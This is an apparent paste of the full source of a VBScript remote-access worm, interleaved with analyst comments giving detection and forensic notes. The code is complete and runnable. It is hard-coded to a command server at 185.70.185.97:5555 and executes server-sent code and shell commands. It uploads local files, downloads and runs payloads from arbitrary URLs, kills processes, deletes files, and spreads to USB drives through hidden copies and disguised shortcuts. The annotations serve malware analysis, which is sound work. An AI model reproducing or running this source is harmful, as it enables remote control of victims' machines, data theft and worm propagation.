medosea12

HMAM

May 18th, 2019
  1.  
  2.  
  ' Analyst note: hard-coded configuration of this sample.
  ' host/port form the HTTP endpoint that every post/download/upload call
  ' contacts; treat the pair as a network indicator for this paste.
  3. host = "185.70.185.97"
  4. port = 5555
  ' Directory that receives the working copy of the script (expanded below).
  5. installdir = "%temp%"
  ' Both shortcut-replacement switches are off here, so the .lnk loops inside
  ' install exit on their first iteration for this configuration.
  6. lnkfile = false
  7. lnkfolder = false
  8.  
  9.  
  10.  
  ' COM objects shared by the whole script: WScript.Shell (process launch,
  ' registry access, shortcut creation), Scripting.FileSystemObject (file and
  ' drive access) and MSXML2.XMLHTTP (HTTP client for the command channel).
  ' Detection: wscript.exe instantiating all three is a useful triage signal.
  11. dim shellobj
  12. set shellobj = wscript.createobject("wscript.shell")
  13. dim filesystemobj
  14. set filesystemobj = createobject("scripting.filesystemobject")
  15. dim httpobj
  16. set httpobj = createobject("msxml2.xmlhttp")
  17.  
  18.  
  19.  
  20.  
  21.  
  ' Script-level state. installname is the script's own file name, so every
  ' dropped copy and the registry marker key reuse that name.
  22. installname = wscript.scriptname
  ' Expand %temp% and append a backslash; fall back to %temp% again when the
  ' configured directory does not exist.
  23. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  24. if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  ' Field delimiter "<|>" used in requests and responses. It is assembled by
  ' concatenation, presumably to keep the literal out of the file (unconfirmed).
  25. spliter = "<" & "|" & ">"
  ' Polling interval in milliseconds, passed to wscript.sleep in the main loop.
  26. sleep = 5000
  27. dim response
  28. dim cmd
  29. dim param
  30. info = ""
  31. usbspreading = ""
  32. startdate = ""
  ' oneonce later holds the text-stream handle opened on the installed copy
  ' (see the instance function).
  33. dim oneonce
  34.  
  35.  
  ' Main polling loop. Analyst summary: after instance runs once, the script
  ' loops forever: it calls install, POSTs "is-ready" to the configured
  ' endpoint, splits the reply on "<|>" and dispatches on the first field.
  ' Errors are suppressed globally, so a failed request simply yields no match
  ' and the loop sleeps and retries.
  ' Detection: periodic HTTP POSTs to /is-ready (and the other is-* paths
  ' below) on the configured port, issued by wscript.exe.
  36. on error resume next
  37.  
  38.  
  39. instance
  40. while true
  41.  
  ' install runs on every iteration, so removable drives attached later are
  ' also written to.
  42. install
  43.  
  44. response = ""
  45. response = post ("is-ready","")
  46. cmd = split (response,spliter)
  47. select case cmd (0)
  ' "excecute" (spelled this way in the sample): the second field is passed
  ' to VBScript's Execute statement, i.e. server-supplied code runs in-process.
  48. case "excecute"
  49. param = cmd (1)
  50. execute param
  ' "update": releases the handle on the installed copy, overwrites that file
  ' with the received text (mode 2 = ForWriting), relaunches it hidden with
  ' wscript.exe //B and exits.
  51. case "update"
  52. param = cmd (1)
  53. oneonce.close
  54. set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
  55. oneonce.write param
  56. oneonce.close
  57. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  58. wscript.quit
  59. case "uninstall"
  60. uninstall
  ' "send" / "site-send": fetch a file (from the endpoint or from an arbitrary
  ' URL), write it to disk and run it. See download and sitedownloader.
  61. case "send"
  62. download cmd (1),cmd (2)
  63. case "site-send"
  64. sitedownloader cmd (1),cmd (2)
  ' "recv": a local file path is read and POSTed out (see upload).
  65. case "recv"
  66. param = cmd (1)
  67. upload (param)
  ' enum-*: drive, directory and process listings are POSTed back under the
  ' matching is-enum-* path.
  68. case "enum-driver"
  69. post "is-enum-driver",enumdriver
  70. case "enum-faf"
  71. param = cmd (1)
  72. post "is-enum-faf",enumfaf (param)
  73. case "enum-process"
  74. post "is-enum-process",enumprocess
  ' "cmd-shell": the field is run through %comspec% /c and the captured output
  ' is POSTed to /is-cmd-shell.
  75. case "cmd-shell"
  76. param = cmd (1)
  77. post "is-cmd-shell",cmdshell (param)
  78. case "delete"
  79. param = cmd (1)
  80. deletefaf (param)
  81. case "exit-process"
  82. param = cmd (1)
  83. exitprocess (param)
  ' "sleep": the new interval is obtained with eval on the received field, so
  ' this is a second place where server-supplied text is evaluated.
  84. case "sleep"
  85. param = cmd (1)
  86. sleep = eval (param)
  87. end select
  88.  
  89. wscript.sleep sleep
  90.  
  91. wend
  92.  
  93.  
  ' install: refreshes the working copy (upstart) and copies the script to the
  ' root of every removable drive that is ready and has free space.
  ' Forensic artefacts on a removable drive: a copy of the script at the root
  ' with Hidden+System attributes and, when the lnkfile/lnkfolder switches are
  ' enabled, original files/folders set Hidden+System and replaced by same-named
  ' .lnk files whose target is cmd.exe.
  94. sub install
  95. on error resume next
  96. dim lnkobj
  97. dim filename
  98. dim foldername
  99. dim fileicon
  100. dim foldericon
  101.  
  102. upstart
  103. for each drive in filesystemobj.drives
  104.  
  105. if drive.isready = true then
  106. if drive.freespace > 0 then
  ' FileSystemObject DriveType 1 = removable.
  107. if drive.drivetype = 1 then
  108. filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  109. if filesystemobj.fileexists (drive.path & "\" & installname) then
  ' Attributes 2+4 = Hidden + System: the copy is invisible with default
  ' Explorer settings.
  110. filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
  111. end if
  ' File loop: skipped entirely unless lnkfile is true.
  112. for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  113. if not lnkfile then exit for
  114. if instr (file.name,".") then
  ' Only files whose last extension is not "lnk" are processed.
  115. if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  116. file.attributes = 2+4
  117. if ucase (file.name) <> ucase (installname) then
  118. filename = split(file.name,".")
  119. set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
  ' WindowStyle 7 = minimized. The shortcut target is cmd.exe, whose arguments
  ' start the script copy first and then the original file.
  ' Detection: .lnk at a removable-drive root with target cmd.exe and
  ' arguments beginning "/c start ".
  120. lnkobj.windowstyle = 7
  121. lnkobj.targetpath = "cmd.exe"
  122. lnkobj.workingdirectory = ""
  123. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  ' The icon is looked up from the file type's DefaultIcon registry value so
  ' the shortcut resembles the file it replaces.
  124. fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  125. if instr (fileicon,",") = 0 then
  126. lnkobj.iconlocation = file.path
  127. else
  128. lnkobj.iconlocation = fileicon
  129. end if
  130. lnkobj.save()
  131. end if
  132. end if
  133. end if
  134. next
  ' Folder loop: same technique for top-level folders, skipped unless
  ' lnkfolder is true. The shortcut starts the script, then opens the folder
  ' with explorer.
  135. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  136. if not lnkfolder then exit for
  137. folder.attributes = 2+4
  138. foldername = folder.name
  139. set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
  140. lnkobj.windowstyle = 7
  141. lnkobj.targetpath = "cmd.exe"
  142. lnkobj.workingdirectory = ""
  143. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  144. foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  145. if instr (foldericon,",") = 0 then
  146. lnkobj.iconlocation = folder.path
  147. else
  148. lnkobj.iconlocation = foldericon
  149. end if
  150. lnkobj.save()
  151. next
  152. end If
  153. end If
  154. end if
  155. next
  156. err.clear
  157. end sub
  158.  
  ' uninstall: deletes the running script file, walks removable drives to undo
  ' the changes made by install, then exits.
  ' Incident-response caveats visible in this listing:
  '  - no registry delete is performed, so the HKLM\software\<script base name>
  '    marker written by instance remains;
  '  - every *.lnk at a removable-drive root is deleted (the else branch does
  '    not check the shortcut's target), which can remove legitimate shortcuts;
  '  - only the file the script is currently running from is deleted on the
  '    fixed disk.
  159. sub uninstall
  160. on error resume next
  161. dim filename
  162. dim foldername
  163.  
  164. filesystemobj.deletefile wscript.scriptfullname ,true
  165.  
  166. for each drive in filesystemobj.drives
  167. if drive.isready = true then
  168. if drive.freespace > 0 then
  ' DriveType 1 = removable, the same filter install uses.
  169. if drive.drivetype = 1 then
  170. for each file in filesystemobj.getfolder ( drive.path & "\").files
  171. on error resume next
  172. if instr (file.name,".") then
  173. if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  ' Non-shortcut file: clear Hidden/System, then delete either its companion
  ' .lnk or, when the file is the script copy itself, the file.
  174. file.attributes = 0
  175. if ucase (file.name) <> ucase (installname) then
  176. filename = split(file.name,".")
  177. filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  178. else
  179. filesystemobj.deletefile (drive.path & "\" & file.name)
  180. end If
  181. else
  ' Shortcut file: deleted unconditionally.
  182. filesystemobj.deletefile (file.path)
  183. end if
  184. end if
  185. next
  ' Top-level folders only get their attributes reset to 0.
  186. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  187. folder.attributes = 0
  188. next
  189. end if
  190. end if
  191. end if
  192. next
  193. wscript.quit
  194. end sub
  195.  
  ' post: sends one synchronous HTTP POST to http://<host>:<port>/<cmd> with
  ' param as the body and returns the response text.
  ' Network detection: the host profile built by information is placed in a
  ' request header named "user-agent:" (with the colon), so the value carries
  ' "<|>"-delimited fields such as the volume serial, computer name and user
  ' name. The pattern resembles the publicly documented H-worm/Houdini VBS
  ' family; confirm against vendor reporting before attributing.
  ' Traffic is plain HTTP, so the fields are visible to proxies and IDS.
  196. function post (cmd ,param)
  197.  
  198. post = param
  199. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  200. httpobj.setrequestheader "user-agent:",information
  201. httpobj.send param
  202. post = httpobj.responsetext
  203. end function
  204.  
  ' information: builds the "<|>"-delimited host profile sent with every
  ' request. Field order as written below: hwid (volume serial), computer
  ' name, user name, OS caption from Win32_OperatingSystem, the literal
  ' "plus", the security string (installed AV names) and the usbspreading
  ' marker. When inf is already non-empty it is returned unchanged.
  ' Privacy/impact note for responders: host name and account name leave the
  ' machine in clear text on each poll.
  205. function information
  206. on error resume next
  207. if inf = "" then
  208. inf = hwid & spliter
  209. inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
  210. inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
  211.  
  212. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  213. set os = root.execquery ("select * from win32_operatingsystem")
  ' Only the first returned OS entry is used.
  214. for each osinfo in os
  215. inf = inf & osinfo.caption & spliter
  216. exit for
  217. next
  218. inf = inf & "plus" & spliter
  219. inf = inf & security & spliter
  220. inf = inf & usbspreading
  221. information = inf
  222. else
  223. information = inf
  224. end if
  225. end function
  226.  
  227.  
  ' upstart: copies the running script to installdir & installname,
  ' overwriting any existing copy. This is the only installation step visible
  ' in this listing; no Run-key or Startup-folder write appears here.
  ' Detection: a script file appearing in %TEMP% with the same name as one
  ' executed from another location.
  228. sub upstart ()
  229. on error resume Next
  230.  
  231. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  232.  
  233. end sub
  234.  
  235.  
  ' hwid: returns the VolumeSerialNumber of the first Win32_LogicalDisk entry
  ' that reports a non-empty serial. The value is used as the host identifier
  ' in the profile string, so it can help correlate captured traffic with a
  ' specific machine.
  236. function hwid
  237. on error resume next
  238.  
  239. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  240. set disks = root.execquery ("select * from win32_logicaldisk")
  241. for each disk in disks
  242. if disk.volumeserialnumber <> "" then
  243. hwid = disk.volumeserialnumber
  244. exit for
  245. end if
  246. next
  247. end function
  248.  
  249.  
  ' security: reports the installed antivirus products. It reads the OS
  ' version via WMI to choose between the root\securitycenter and
  ' root\securitycenter2 namespaces, queries AntiVirusProduct there and
  ' concatenates each displayName followed by " ."; "nan-av" is returned when
  ' nothing was collected.
  ' NOTE(review): the version handling runs under "on error resume next", so
  ' which namespace is actually queried cannot be determined from the listing
  ' alone; treat the reported AV field as unreliable when reading captures.
  ' Detection: wscript.exe querying AntiVirusProduct via WMI.
  250. function security
  251. on error resume next
  252.  
  253. security = ""
  254.  
  255. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  ' Flag 48 = wbemFlagReturnImmediately + wbemFlagForwardOnly.
  256. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  257. for each objitem in colitems
  258. versionstr = split (objitem.version,".")
  259. next
  260. versionstr = split (colitems.version,".")
  261. osversion = versionstr (0) & "."
  262. for x = 1 to ubound (versionstr)
  263. osversion = osversion & versionstr (i)
  264. next
  265. osversion = eval (osversion)
  266. if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  267.  
  268. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  269. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  270.  
  271. for each objantivirus in colantivirus
  272. security = security & objantivirus.displayname & " ."
  273. next
  274. if security = "" then security = "nan-av"
  275. end function
  276.  
  277.  
  ' instance: start-up routine, run once before the main loop.
  ' 1. Reads the default value of HKLM\software\<script base name>\. If it is
  '    empty, writes "true - <date>" when the script is running from the root
  '    of a drive (path is "<letter>:\<installname>") and "false - <date>"
  '    otherwise. The value records whether the first run came from a drive
  '    root and on which date.
  ' 2. Copies itself to installdir (upstart); if it is not already running
  '    from that copy, launches the copy with wscript.exe //B and exits.
  ' 3. Opens the installed copy for appending (mode 8) and keeps the handle in
  '    oneonce; if the open raises an error the script quits. This looks like
  '    a single-instance guard (unconfirmed).
  ' Forensics: the registry value gives a first-execution date and the likely
  ' infection vector; writing under HKLM normally needs elevation, and a
  ' failure is hidden by "on error resume next".
  278. function instance
  279. on error resume next
  280.  
  281. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  282. if usbspreading = "" then
  283. if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
  284. usbspreading = "true - " & date
  285. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
  286. else
  287. usbspreading = "false - " & date
  288. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
  289.  
  290. end if
  291. end If
  292.  
  293.  
  294.  
  295. upstart
  ' Short (8.3) paths are compared so differently spelled paths to the same
  ' file still match.
  296. set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
  297. set installfullnameshort = filesystemobj.getfile (installdir & installname)
  298. if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  ' Detection: wscript.exe //B started by another wscript.exe with a script
  ' path under %TEMP%.
  299. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  300. wscript.quit
  301. end If
  302. err.clear
  303. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  304. if err.number > 0 then wscript.quit
  305. end function
  306.  
  307.  
  ' sitedownloader: fetches fileurl with an HTTP GET, writes the response body
  ' to installdir & filename (replacing any existing file) when the status is
  ' 200, and then runs the saved file through WScript.Shell.
  ' Both the URL and the file name come from the server reply, so this is a
  ' second-stage download-and-execute path to any URL.
  ' Detection: wscript.exe writing a new file into %TEMP% via ADODB.Stream and
  ' immediately launching it; outbound GETs from wscript.exe to hosts other
  ' than the configured endpoint.
  308. sub sitedownloader (fileurl,filename)
  309.  
  310. strlink = fileurl
  311. strsaveto = installdir & filename
  312. set objhttpdownload = createobject("msxml2.xmlhttp" )
  313. objhttpdownload.open "get", strlink, false
  314. objhttpdownload.send
  315.  
  316. set objfsodownload = createobject ("scripting.filesystemobject")
  317. if objfsodownload.fileexists (strsaveto) then
  318. objfsodownload.deletefile (strsaveto)
  319. end if
  320.  
  321. if objhttpdownload.status = 200 then
  322. dim objstreamdownload
  323. set objstreamdownload = createobject("adodb.stream")
  324. with objstreamdownload
  ' Stream type 1 = binary.
  325. .type = 1
  326. .open
  327. .write objhttpdownload.responsebody
  328. .savetofile strsaveto
  329. .close
  330. end with
  331. set objstreamdownload = nothing
  332. end if
  ' The file is launched by its short (8.3) path.
  333. if objfsodownload.fileexists(strsaveto) then
  334. shellobj.run objfsodownload.getfile (strsaveto).shortpath
  335. end if
  336. end sub
  337.  
  ' download: retrieves a file from the configured endpoint by POSTing to
  ' /is-sending<|><fileurl>, saves the response body under filedir (installdir
  ' when filedir is empty) using the part of fileurl after the last backslash
  ' as the file name, and runs the saved file.
  ' Detection: POST requests whose URI contains "is-sending" followed by the
  ' "<|>" delimiter, then a file creation and process start by wscript.exe.
  338. sub download (fileurl,filedir)
  339.  
  340. if filedir = "" then
  341. filedir = installdir
  342. end if
  343.  
  344. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  345. set objhttpdownload = createobject("msxml2.xmlhttp")
  346. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  347. objhttpdownload.send ""
  348.  
  349. set objfsodownload = createobject ("scripting.filesystemobject")
  ' Any existing file at the destination is removed before the status check.
  350. if objfsodownload.fileexists (strsaveto) then
  351. objfsodownload.deletefile (strsaveto)
  352. end if
  353. if objhttpdownload.status = 200 then
  354. dim objstreamdownload
  355. set objstreamdownload = createobject("adodb.stream")
  356. with objstreamdownload
  ' Stream type 1 = binary.
  357. .type = 1
  358. .open
  359. .write objhttpdownload.responsebody
  360. .savetofile strsaveto
  361. .close
  362. end with
  363. set objstreamdownload = nothing
  364. end if
  365. if objfsodownload.fileexists(strsaveto) then
  366. shellobj.run objfsodownload.getfile (strsaveto).shortpath
  367. end if
  368. end sub
  369.  
  370.  
  ' upload: reads the local file named by fileurl as binary and POSTs its
  ' contents to /is-recving<|><fileurl> on the configured endpoint. This is
  ' the data-exfiltration path; the local path appears in the request URI.
  ' The local "dim httpobj" shadows the script-level object, and no
  ' "user-agent:" header is set on this request.
  ' Detection: POST URIs containing "is-recving" and a Windows file path.
  371. function upload (fileurl)
  372.  
  373. dim httpobj,objstreamuploade,buffer
  374. set objstreamuploade = createobject("adodb.stream")
  375. with objstreamuploade
  ' Stream type 1 = binary.
  376. .type = 1
  377. .open
  378. .loadfromfile fileurl
  379. buffer = .read
  380. .close
  381. end with
  382. set objstreamdownload = nothing
  383. set httpobj = createobject("msxml2.xmlhttp")
  384. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  385. httpobj.send buffer
  386. end function
  387.  
  388.  
  ' enumdriver: returns one "<path>|<drivetype>" entry per ready drive, each
  ' followed by the "<|>" delimiter. The result is sent back under
  ' /is-enum-driver by the main loop.
  389. function enumdriver ()
  390.  
  391. for each drive in filesystemobj.drives
  392. if drive.isready = true then
  393. enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  394. end if
  395. next
  396. end Function
  397.  
  ' enumfaf: directory listing for enumdir. The result starts with the
  ' directory path, then one entry per subfolder ("name||d|attributes") and
  ' one per file ("name|size|f|attributes"), each terminated by "<|>".
  ' No error handler is set in this function; it relies on the script-level
  ' "on error resume next" not being in effect inside procedures, so a missing
  ' directory would raise here (behaviour not confirmed from the listing).
  398. function enumfaf (enumdir)
  399.  
  400. enumfaf = enumdir & spliter
  401. for each folder in filesystemobj.getfolder (enumdir).subfolders
  402. enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  403. next
  404.  
  405. for each file in filesystemobj.getfolder (enumdir).files
  406. enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
  407.  
  408. next
  409. end function
  410.  
  411.  
  ' enumprocess: lists running processes from Win32_Process as
  ' "name|pid|executablepath" entries separated by "<|>".
  ' Detection: wscript.exe issuing "select * from win32_process" over WMI.
  412. function enumprocess ()
  413.  
  414. on error resume next
  415.  
  416. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  ' Flag 48 = wbemFlagReturnImmediately + wbemFlagForwardOnly.
  417. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  418.  
  419. dim objitem
  420. for each objitem in colitems
  421. enumprocess = enumprocess & objitem.name & "|"
  422. enumprocess = enumprocess & objitem.processid & "|"
  423. enumprocess = enumprocess & objitem.executablepath & spliter
  424. next
  425. end function
  426.  
  ' exitprocess: force-terminates the process tree of the given PID with
  ' taskkill, run minimized (window style 7) and waited on (true).
  ' pid is concatenated into the command line without validation.
  ' Detection: taskkill.exe /F /T /PID spawned by wscript.exe.
  427. sub exitprocess (pid)
  428. on error resume next
  429.  
  430. shellobj.run "taskkill /F /T /PID " & pid,7,true
  431. end sub
  432.  
  ' deletefaf: tries to delete url first as a file and then as a folder;
  ' whichever call does not apply fails silently under "on error resume next".
  ' The path comes straight from the server reply, so any file or folder the
  ' user can delete is in scope.
  433. sub deletefaf (url)
  434. on error resume next
  435.  
  436. filesystemobj.deletefile url
  437. filesystemobj.deletefolder url
  438.  
  439. end sub
  440.  
  ' cmdshell: runs "%comspec% /c <cmd>" through WScript.Shell.Exec and returns
  ' captured output: stdout when it has data, otherwise stderr, otherwise an
  ' empty string. The main loop POSTs the result to /is-cmd-shell.
  ' Detection: cmd.exe with a /c command line whose parent is wscript.exe,
  ' followed by an HTTP POST to the is-cmd-shell path.
  441. function cmdshell (cmd)
  442.  
  443. dim httpobj,oexec,readallfromany
  444.  
  445. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  446. if not oexec.stdout.atendofstream then
  447. readallfromany = oexec.stdout.readall
  448. elseif not oexec.stderr.atendofstream then
  449. readallfromany = oexec.stderr.readall
  450. else
  451. readallfromany = ""
  452. end if
  453.  
  454. cmdshell = readallfromany
  455. end function